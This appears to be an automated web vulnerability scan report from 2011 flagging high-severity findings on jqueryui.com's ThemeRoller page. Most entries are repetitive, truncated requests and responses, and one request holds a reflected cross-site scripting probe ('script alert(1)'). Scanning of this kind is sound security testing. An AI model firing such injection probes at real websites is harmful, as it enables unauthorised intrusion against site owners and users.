HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Wed, 06 Jul 2011 11:23:19 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www3 X-Proxy: 2 Content-Length: 120133 <!DOCTYPE html> <html> <head> <meta charset="UTF-8" /> <title>jQuery UI - ThemeRoller</title> <meta name="keywords" content="jquery,user interface,ui,widgets <meta nam ...[SNIP]... rError=fef1ec&bgText ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://jqueryui.com |
Path: | /themeroller/ |
GET /themeroller/?ffDefault Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Wed, 06 Jul 2011 11:23:22 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www3 X-Proxy: 2 Content-Length: 120133 <!DOCTYPE html> <html> <head> <meta charset="UTF-8" /> <title>jQuery UI - ThemeRoller</title> <meta name="keywords" content="jquery,user interface,ui,widgets <meta nam ...[SNIP]... a0a&fcError=cd0a0a ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://jqueryui.com |
Path: | /themeroller/ |
GET /themeroller/?ffDefault Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Wed, 06 Jul 2011 11:23:04 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www3 X-Proxy: 2 Content-Length: 120067 <!DOCTYPE html> <html> <head> <meta charset="UTF-8" /> <title>jQuery UI - ThemeRoller</title> <meta name="keywords" content="jquery,user interface,ui,widgets <meta nam ...[SNIP]... 888&bgColorHover=dadada ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://jqueryui.com |
Path: | /themeroller/ |
GET /themeroller/?ffDefault Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Wed, 06 Jul 2011 11:22:50 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www3 X-Proxy: 2 Content-Length: 120067 <!DOCTYPE html> <html> <head> <meta charset="UTF-8" /> <title>jQuery UI - ThemeRoller</title> <meta name="keywords" content="jquery,user interface,ui,widgets <meta nam ...[SNIP]... s=5px&bgColorHeader ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://jqueryui.com |
Path: | /themeroller/ |
GET /themeroller/?ffDefault Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Wed, 06 Jul 2011 11:22:54 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www3 X-Proxy: 2 Content-Length: 120067 <!DOCTYPE html> <html> <head> <meta charset="UTF-8" /> <title>jQuery UI - ThemeRoller</title> <meta name="keywords" content="jquery,user interface,ui,widgets <meta nam ...[SNIP]... bgColorContent=000000 ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://jqueryui.com |
Path: | /themeroller/ |
GET /themeroller/?ffDefault Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Wed, 06 Jul 2011 11:23:13 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www3 X-Proxy: 2 Content-Length: 120067 <!DOCTYPE html> <html> <head> <meta charset="UTF-8" /> <title>jQuery UI - ThemeRoller</title> <meta name="keywords" content="jquery,user interface,ui,widgets <meta nam ...[SNIP]... orHighlight=fbf9ee ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://jqueryui.com |
Path: | /themeroller/ |
GET /themeroller/?ffDefault Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Wed, 06 Jul 2011 11:22:45 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www4 X-Proxy: 2 Content-Length: 120067 <!DOCTYPE html> <html> <head> <meta charset="UTF-8" /> <title>jQuery UI - ThemeRoller</title> <meta name="keywords" content="jquery,user interface,ui,widgets <meta nam ...[SNIP]... href="/themeroller/css ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://jqueryui.com |
Path: | /themeroller/ |
GET /themeroller/?ffDefault Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Wed, 06 Jul 2011 11:23:09 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www3 X-Proxy: 2 Content-Length: 120067 <!DOCTYPE html> <html> <head> <meta charset="UTF-8" /> <title>jQuery UI - ThemeRoller</title> <meta name="keywords" content="jquery,user interface,ui,widgets <meta nam ...[SNIP]... &bgColorActive=dadada ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://jqueryui.com |
Path: | /themeroller/ |
GET /themeroller/?ffDefault Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Wed, 06 Jul 2011 11:22:59 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www3 X-Proxy: 2 Content-Length: 120067 <!DOCTYPE html> <html> <head> <meta charset="UTF-8" /> <title>jQuery UI - ThemeRoller</title> <meta name="keywords" content="jquery,user interface,ui,widgets <meta nam ...[SNIP]... rDefault=8F8F8F ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://jqueryui.com |
Path: | /themeroller/ |
GET /themeroller/?ffDefault Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Wed, 06 Jul 2011 11:23:18 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www4 X-Proxy: 2 Content-Length: 120067 <!DOCTYPE html> <html> <head> <meta charset="UTF-8" /> <title>jQuery UI - ThemeRoller</title> <meta name="keywords" content="jquery,user interface,ui,widgets <meta nam ...[SNIP]... ighlight=2e83ff ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://jqueryui.com |
Path: | /themeroller/ |
GET /themeroller/?ffDefault Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Wed, 06 Jul 2011 11:23:21 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www3 X-Proxy: 2 Content-Length: 120067 <!DOCTYPE html> <html> <head> <meta charset="UTF-8" /> <title>jQuery UI - ThemeRoller</title> <meta name="keywords" content="jquery,user interface,ui,widgets <meta nam ...[SNIP]... &borderColorError=cd0a0a ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://jqueryui.com |
Path: | /themeroller/ |
GET /themeroller/?ffDefault Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Wed, 06 Jul 2011 11:23:06 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www4 X-Proxy: 2 Content-Length: 120133 <!DOCTYPE html> <html> <head> <meta charset="UTF-8" /> <title>jQuery UI - ThemeRoller</title> <meta name="keywords" content="jquery,user interface,ui,widgets <meta nam ...[SNIP]... ight_hard.png&bgImgO ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://jqueryui.com |
Path: | /themeroller/ |
GET /themeroller/?ffDefault Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Wed, 06 Jul 2011 11:22:51 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www3 X-Proxy: 2 Content-Length: 120133 <!DOCTYPE html> <html> <head> <meta charset="UTF-8" /> <title>jQuery UI - ThemeRoller</title> <meta name="keywords" content="jquery,user interface,ui,widgets <meta nam ...[SNIP]... hlight_soft.png ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://jqueryui.com |
Path: | /themeroller/ |
GET /themeroller/?ffDefault Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Wed, 06 Jul 2011 11:22:56 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www3 X-Proxy: 2 Content-Length: 120133 <!DOCTYPE html> <html> <head> <meta charset="UTF-8" /> <title>jQuery UI - ThemeRoller</title> <meta name="keywords" content="jquery,user interface,ui,widgets <meta nam ...[SNIP]... g&bgImgOpacityContent=75 ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://jqueryui.com |
Path: | /themeroller/ |
GET /themeroller/?ffDefault Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Wed, 06 Jul 2011 11:23:15 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www4 X-Proxy: 2 Content-Length: 120133 <!DOCTYPE html> <html> <head> <meta charset="UTF-8" /> <title>jQuery UI - ThemeRoller</title> <meta name="keywords" content="jquery,user interface,ui,widgets <meta nam ...[SNIP]... s.png&bgImgOpacityHi ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://jqueryui.com |
Path: | /themeroller/ |
GET /themeroller/?ffDefault Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Wed, 06 Jul 2011 11:22:46 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www4 X-Proxy: 2 Content-Length: 120133 <!DOCTYPE html> <html> <head> <meta charset="UTF-8" /> <title>jQuery UI - ThemeRoller</title> <meta name="keywords" content="jquery,user interface,ui,widgets <meta nam ...[SNIP]... hemeroller&ffDefault ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://jqueryui.com |
Path: | /themeroller/ |
GET /themeroller/?ffDefault Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Wed, 06 Jul 2011 11:23:10 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www4 X-Proxy: 2 Content-Length: 120133 <!DOCTYPE html> <html> <head> <meta charset="UTF-8" /> <title>jQuery UI - ThemeRoller</title> <meta name="keywords" content="jquery,user interface,ui,widgets <meta nam ...[SNIP]... rd.png&bgImgOpacityActive ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://jqueryui.com |
Path: | /themeroller/ |
GET /themeroller/?ffDefault Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Wed, 06 Jul 2011 11:23:01 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www3 X-Proxy: 2 Content-Length: 120133 <!DOCTYPE html> <html> <head> <meta charset="UTF-8" /> <title>jQuery UI - ThemeRoller</title> <meta name="keywords" content="jquery,user interface,ui,widgets <meta nam ...[SNIP]... _hard.png&bgImgOpaci ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://jqueryui.com |
Path: | /themeroller/ |
GET /themeroller/?ffDefault Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Wed, 06 Jul 2011 11:22:43 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www3 X-Proxy: 2 Content-Length: 120133 <!DOCTYPE html> <html> <head> <meta charset="UTF-8" /> <title>jQuery UI - ThemeRoller</title> <meta name="keywords" content="jquery,user interface,ui,widgets <meta nam ...[SNIP]... <link rel="stylesheet" href="/themeroller/css ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://jqueryui.com |
Path: | /themeroller/ |
GET /themeroller/?ffDefault Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Wed, 06 Jul 2011 11:23:26 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www4 X-Proxy: 2 Content-Length: 120133 <!DOCTYPE html> <html> <head> <meta charset="UTF-8" /> <title>jQuery UI - ThemeRoller</title> <meta name="keywords" content="jquery,user interface,ui,widgets <meta nam ...[SNIP]... yOverlay=0&opacityOverlay ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://jqueryui.com |
Path: | /themeroller/ |
GET /themeroller/?ffDefault Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Wed, 06 Jul 2011 11:23:06 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www3 X-Proxy: 2 Content-Length: 120130 <!DOCTYPE html> <html> <head> <meta charset="UTF-8" /> <title>jQuery UI - ThemeRoller</title> <meta name="keywords" content="jquery,user interface,ui,widgets <meta nam ...[SNIP]... ImgOpacityHover=75 ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://jqueryui.com |
Path: | /themeroller/ |
GET /themeroller/?ffDefault Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Wed, 06 Jul 2011 11:22:52 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www3 X-Proxy: 2 Content-Length: 120133 <!DOCTYPE html> <html> <head> <meta charset="UTF-8" /> <title>jQuery UI - ThemeRoller</title> <meta name="keywords" content="jquery,user interface,ui,widgets <meta nam ...[SNIP]... gImgOpacityHeader=75 ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://jqueryui.com |
Path: | /themeroller/ |
GET /themeroller/?ffDefault Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Wed, 06 Jul 2011 11:22:57 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www3 X-Proxy: 2 Content-Length: 120133 <!DOCTYPE html> <html> <head> <meta charset="UTF-8" /> <title>jQuery UI - ThemeRoller</title> <meta name="keywords" content="jquery,user interface,ui,widgets <meta nam ...[SNIP]... tent=75&borderColorC ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://jqueryui.com |
Path: | /themeroller/ |
GET /themeroller/?ffDefault Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Wed, 06 Jul 2011 11:23:16 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www3 X-Proxy: 2 Content-Length: 120133 <!DOCTYPE html> <html> <head> <meta charset="UTF-8" /> <title>jQuery UI - ThemeRoller</title> <meta name="keywords" content="jquery,user interface,ui,widgets <meta nam ...[SNIP]... ityHighlight=55 ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://jqueryui.com |
Path: | /themeroller/ |
GET /themeroller/?ffDefault Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Wed, 06 Jul 2011 11:22:47 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www4 X-Proxy: 2 Content-Length: 120133 <!DOCTYPE html> <html> <head> <meta charset="UTF-8" /> <title>jQuery UI - ThemeRoller</title> <meta name="keywords" content="jquery,user interface,ui,widgets <meta nam ...[SNIP]... ault=Verdana,Arial,sans ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://jqueryui.com |
Path: | /themeroller/ |
GET /themeroller/?ffDefault Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Wed, 06 Jul 2011 11:23:11 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www4 X-Proxy: 2 Content-Length: 120133 <!DOCTYPE html> <html> <head> <meta charset="UTF-8" /> <title>jQuery UI - ThemeRoller</title> <meta name="keywords" content="jquery,user interface,ui,widgets <meta nam ...[SNIP]... Active=75&borderColo ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://jqueryui.com |
Path: | /themeroller/ |
GET /themeroller/?ffDefault Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Wed, 06 Jul 2011 11:23:02 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www4 X-Proxy: 2 Content-Length: 120133 <!DOCTYPE html> <html> <head> <meta charset="UTF-8" /> <title>jQuery UI - ThemeRoller</title> <meta name="keywords" content="jquery,user interface,ui,widgets <meta nam ...[SNIP]... OpacityDefault=75 ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://jqueryui.com |
Path: | /themeroller/ |
GET /themeroller/?ffDefault Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Wed, 06 Jul 2011 11:22:41 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www3 X-Proxy: 2 Content-Length: 120133 <!DOCTYPE html> <html> <head> <meta charset="UTF-8" /> <title>jQuery UI - ThemeRoller</title> <meta name="keywords" content="jquery,user interface,ui,widgets <meta nam ...[SNIP]... <link rel="stylesheet" href="/themeroller/css ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://jqueryui.com |
Path: | /themeroller/ |
GET /themeroller/?ffDefault Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Wed, 06 Jul 2011 11:22:43 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www3 X-Proxy: 2 Content-Length: 120133 <!DOCTYPE html> <html> <head> <meta charset="UTF-8" /> <title>jQuery UI - ThemeRoller</title> <meta name="keywords" content="jquery,user interface,ui,widgets <meta nam ...[SNIP]... <link rel="stylesheet" href="/themeroller/css ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://jqueryui.com |
Path: | /themeroller/ |
GET /themeroller/?ffDefault Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Wed, 06 Jul 2011 11:22:42 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www3 X-Proxy: 2 Content-Length: 120068 <!DOCTYPE html> <html> <head> <meta charset="UTF-8" /> <title>jQuery UI - ThemeRoller</title> <meta name="keywords" content="jquery,user interface,ui,widgets <meta nam ...[SNIP]... <link rel="stylesheet" href="/themeroller/css ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://jqueryui.com |
Path: | /themeroller/ |
GET /themeroller/?ffDefault Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Wed, 06 Jul 2011 11:23:07 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www3 X-Proxy: 2 Content-Length: 120133 <!DOCTYPE html> <html> <head> <meta charset="UTF-8" /> <title>jQuery UI - ThemeRoller</title> <meta name="keywords" content="jquery,user interface,ui,widgets <meta nam ...[SNIP]... erColorHover=999999 ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://jqueryui.com |
Path: | /themeroller/ |
GET /themeroller/?ffDefault Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Wed, 06 Jul 2011 11:22:53 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www4 X-Proxy: 2 Content-Length: 120133 <!DOCTYPE html> <html> <head> <meta charset="UTF-8" /> <title>jQuery UI - ThemeRoller</title> <meta name="keywords" content="jquery,user interface,ui,widgets <meta nam ...[SNIP]... derColorHeader=aaaaaa ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://jqueryui.com |
Path: | /themeroller/ |
GET /themeroller/?ffDefault Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Wed, 06 Jul 2011 11:22:58 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www3 X-Proxy: 2 Content-Length: 120133 <!DOCTYPE html> <html> <head> <meta charset="UTF-8" /> <title>jQuery UI - ThemeRoller</title> <meta name="keywords" content="jquery,user interface,ui,widgets <meta nam ...[SNIP]... nt=aaaaaa&fcContent ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://jqueryui.com |
Path: | /themeroller/ |
GET /themeroller/?ffDefault Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Wed, 06 Jul 2011 11:23:17 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www3 X-Proxy: 2 Content-Length: 120133 <!DOCTYPE html> <html> <head> <meta charset="UTF-8" /> <title>jQuery UI - ThemeRoller</title> <meta name="keywords" content="jquery,user interface,ui,widgets <meta nam ...[SNIP]... ColorHighlight=fcefa1 ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://jqueryui.com |
Path: | /themeroller/ |
GET /themeroller/?ffDefault Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Wed, 06 Jul 2011 11:22:48 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www4 X-Proxy: 2 Content-Length: 120133 <!DOCTYPE html> <html> <head> <meta charset="UTF-8" /> <title>jQuery UI - ThemeRoller</title> <meta name="keywords" content="jquery,user interface,ui,widgets <meta nam ...[SNIP]... -serif&fwDefault=normal ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://jqueryui.com |
Path: | /themeroller/ |
GET /themeroller/?ffDefault Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Wed, 06 Jul 2011 11:23:12 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www4 X-Proxy: 2 Content-Length: 120133 <!DOCTYPE html> <html> <head> <meta charset="UTF-8" /> <title>jQuery UI - ThemeRoller</title> <meta name="keywords" content="jquery,user interface,ui,widgets <meta nam ...[SNIP]... e=999999&fcActive=000000 ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://jqueryui.com |
Path: | /themeroller/ |
GET /themeroller/?ffDefault Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Wed, 06 Jul 2011 11:23:03 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www3 X-Proxy: 2 Content-Length: 120133 <!DOCTYPE html> <html> <head> <meta charset="UTF-8" /> <title>jQuery UI - ThemeRoller</title> <meta name="keywords" content="jquery,user interface,ui,widgets <meta nam ...[SNIP]... erColorDefault=999999 ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://jqueryui.com |
Path: | /themeroller/ |
GET /themeroller/?ab231"><script>alert(1)< Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Wed, 06 Jul 2011 11:21:58 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www3 X-Proxy: 2 Content-Length: 117123 <!DOCTYPE html> <html> <head> <meta charset="UTF-8" /> <title>jQuery UI - ThemeRoller</title> <meta name="keywords" content="jquery,user interface,ui,widgets <meta nam ...[SNIP]... <link rel="stylesheet" href="/themeroller/css ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://jqueryui.com |
Path: | /themeroller/ |
GET /themeroller/?ffDefault Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Wed, 06 Jul 2011 11:23:25 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www4 X-Proxy: 2 Content-Length: 120133 <!DOCTYPE html> <html> <head> <meta charset="UTF-8" /> <title>jQuery UI - ThemeRoller</title> <meta name="keywords" content="jquery,user interface,ui,widgets <meta nam ...[SNIP]... 01_flat.png&bgImgOpa ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://jqueryui.com |
Path: | /themeroller/ |
GET /themeroller/?ffDefault Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Wed, 06 Jul 2011 11:23:24 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www3 X-Proxy: 2 Content-Length: 120133 <!DOCTYPE html> <html> <head> <meta charset="UTF-8" /> <title>jQuery UI - ThemeRoller</title> <meta name="keywords" content="jquery,user interface,ui,widgets <meta nam ...[SNIP]... aaaa&bgTextureOverlay=01 ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://jqueryui.com |
Path: | /themeroller/ |
GET /themeroller/?ffDefault Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
